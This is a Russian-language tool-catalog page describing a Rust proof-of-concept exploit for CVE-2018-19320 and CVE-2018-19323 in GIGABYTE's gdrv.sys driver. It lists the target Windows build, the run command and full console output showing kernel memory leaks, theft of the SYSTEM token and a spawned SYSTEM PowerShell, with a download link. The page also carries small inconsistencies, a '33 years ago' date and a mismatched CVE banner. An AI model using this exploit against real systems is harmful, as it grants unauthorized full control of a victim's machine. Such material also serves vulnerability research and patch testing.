Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-1932X — Rust POC для уязвимостей CVE-2018-1932X в драйвере ядра | Kitploit
Инструменты/GitHubGitHub/bkreisel/cve-2018-1932x
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

Rust POC для уязвимостей CVE-2018-1932X в драйвере ядра

Репозиторий
33 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-1932X (Rust Exploit POC) для GIGABYTE APP Center v1.05.21 и более ранних версий

То, что ваша цель небезопасна с точки зрения памяти, не означает, что ваш эксплойт должен быть таким же!

Используемые уязвимости:

  • CVE-2018-19320 - memcpy-подобная функциональность на уровне ring0
  • CVE-2018-19323 - чтение и запись машинно-зависимых регистров (MSR).

Протестировано на:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

Ссылки

  • Проект Vergilius: Структуры ядра
  • Объявление о патче от Gigabyte
  • Детали _KPCR

Требования

  • Только x64
  • Номера сборок указаны выше
  • Загруженный драйвер GIGABYTE: gdrv.sys

Использование

.\CVE-2018-1932X.exe

Пример

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

Запущенный PowerShell:

root@kitploit:~
PS C:\> whoami
nt authority\system

Уязвимые блоки

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

Манипуляция MSR (IOCTL 0x0C3502580)

MSR Code Blocks

Скачать инструмент